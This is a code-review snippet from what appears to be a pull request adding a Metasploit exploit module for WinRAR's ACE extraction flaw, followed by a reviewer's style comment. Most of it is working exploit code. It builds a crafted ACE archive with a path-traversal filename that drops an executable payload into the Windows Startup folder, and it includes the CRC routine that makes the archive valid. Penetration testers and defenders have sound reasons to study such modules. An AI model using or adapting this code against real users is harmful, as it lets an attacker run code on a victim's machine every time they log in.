modules/exploits/windows/fileformat/winrar_ace.rb

```diff
@@ -0,0 +1,228 @@
+    ace_header_crc32 = crc32(ace_header[4, ace_header.length]).to_s(16)
+    ace_header_crc16 = ace_header_crc32.last(4).to_i(base=16)
+    ace_header[0,2] = [ace_header_crc16].pack("v")
+
+    # start putting the ACE file together
+    ace_file = ""
+    ace_file << ace_header
+
+    # create headers and append file data after header
+    unless datastore["FILE_LIST"].empty?
+      print_status("Using the provided list of files @ #{datastore["FILE_LIST"]}...")
+      File.read(datastore["FILE_LIST"]).each_line do |file|
+        file = file.chomp
+        file_header_and_data = create_file_header_and_data(file, false, false)
+        ace_file << file_header_and_data
+      end
+    end
+
+    # autogenerated payload
+    if datastore["CUSTFILE"].empty?
+      payload_filename = ""
+      # 72 characters
+      payload_filename << "C:\\C:C:../AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"
+      # 6 characters
+      payload_filename << rand_text_alpha(6)
+      # 4 characters
+      payload_filename << ".exe"
+      payload_file_header = create_file_header_and_data(payload_filename, true, false)
+    # user-defined payload
+    else
+      print_status("Using a custom payload: #{::File.basename(datastore["CUSTFILE"])}")
+      payload_filename = ""
+      # 72 characters
+      payload_filename << "C:\\C:C:../AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"
+      # n characters
+      payload_filename << ::File.basename(datastore["CUSTFILE"])
+      payload_file_header = create_file_header_and_data(payload_filename, true, true)
+    end
+
+    vprint_status("Payload filename: #{payload_filename.from(72)}")
+
+    # append payload file header and the payload itself into the rest of the data
+    ace_file << payload_file_header
+    # create the file
+    file_create(ace_file)
+  end
+
+  # The CRC implementation used in ACE does not take the last step in calculating CRC32.
+  # That is, it does not flip the bits. Therefore, it can be easily calculated by taking
+  # the negative bitwise OR of the usual CRC and then subtracting one from it. This is due to
+  # the way the bitwise OR works in Ruby: unsigned integers are not a thing in Ruby, so
+  # applying a bitwise OR on an integer will produce its negative + 1.
+  def crc32(data)
+    table = Zlib.crc_table
+    crc = 0xffffffff
+    data.unpack('C*').each { |b|
+      crc = table[(crc & 0xff) ^ b] ^ (crc >> 8)
+    }
+    -(~crc) - 1
+  end
+
+  # copypasta from lib/msf/core/exploit/exe.rb
+  def get_file_contents(path)
+    file_contents = nil
+    ::File.open(path,'rb') {|f| file_contents = f.read(f.stat.size)}
+    file_contents
+  end
+
+  # create file headers for each file to put into the output ACE file
+  def create_file_header_and_data(path, is_payload, is_custom_payload)
+    #print_status("Length of #{path}: #{path.length}")
+    if is_payload and is_custom_payload
+      file_data = get_file_contents(path.from(72))
```

Comment:
you can replace this with `File.binread(path.from(72))`, which does the exact thing as `get_file_contents`, then you can remove the copypasta here (exe.rb probably aught to be updated too, come to think of it :)